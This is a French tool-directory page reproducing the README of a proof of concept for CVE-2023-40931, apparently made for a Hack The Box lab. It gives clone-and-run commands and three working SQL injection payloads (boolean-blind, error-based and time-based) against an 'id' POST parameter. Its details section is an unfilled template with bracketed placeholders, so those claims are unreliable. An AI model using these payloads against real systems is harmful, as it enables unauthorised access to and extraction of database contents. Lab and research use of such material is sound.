Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-40931-POC — Preuve de concept pour CVE-2023-40931, créée pour HTB MONITORED | Kitploit
Outils/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

Preuve de concept pour CVE-2023-40931, créée pour HTB MONITORED

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-40931 Preuve de concept (PoC) 🚨

Ce dépôt contient une preuve de concept (PoC) pour CVE-2023-40931, une vulnérabilité de sécurité identifiée dans [logiciel/système concerné]. L'objectif de ce dépôt est de démontrer la vulnérabilité à des fins éducatives et de recherche uniquement. 🛠️

Avertissement ⚠️

Ce projet est destiné à des fins éducatives et à des tests autorisés uniquement. Toute mauvaise utilisation de ce code peut entraîner des conséquences juridiques. Les auteurs ne sont pas responsables de toute mauvaise utilisation ou de tout dommage causé par ce code. Obtenez toujours une autorisation appropriée avant de tester un système. 🔒

Détails 📋

  • Identifiant CVE : CVE-2023-40931
  • Type de vulnérabilité : [Type de vulnérabilité, p. ex. exécution de code à distance, élévation de privilèges]
  • Logiciel concerné : [Nom et version du logiciel concerné]
  • Gravité : [Niveau de gravité, p. ex. critique, élevé] 🚩

Pour plus d'informations, consultez l'entrée CVE officielle : CVE-2023-40931. 🔗

Utilisation 🚀

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    Le paramètre POST « id » est vulnérable. Les payloads suivants ont permis d'exploiter la vulnérabilité avec succès :

    • Aveugle basé sur un booléen : ce payload exploite une instruction conditionnelle pour déterminer la valeur de vérité d'une requête, ce qui permet l'extraction de données via la logique booléenne.

      • Payload : action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • Basé sur les erreurs : ce payload exploite les messages d'erreur de la base de données pour extraire des informations en déclenchant des erreurs spécifiques.

      • Payload : action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • Aveugle basé sur le temps : ce payload utilise des délais temporels pour déduire des informations en observant le temps de réponse du serveur.

      • Payload : action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    Ces payloads démontrent la susceptibilité de la vulnérabilité aux attaques par injection SQL. Procédez avec prudence et assurez-vous d'avoir une autorisation appropriée avant de tester. 🔒

  2. Suivez les instructions du fichier exploit.py pour exécuter le PoC. 🧑‍💻

    Remarque : assurez-vous d'avoir installé les dépendances requises. ✅

Télécharger l’outil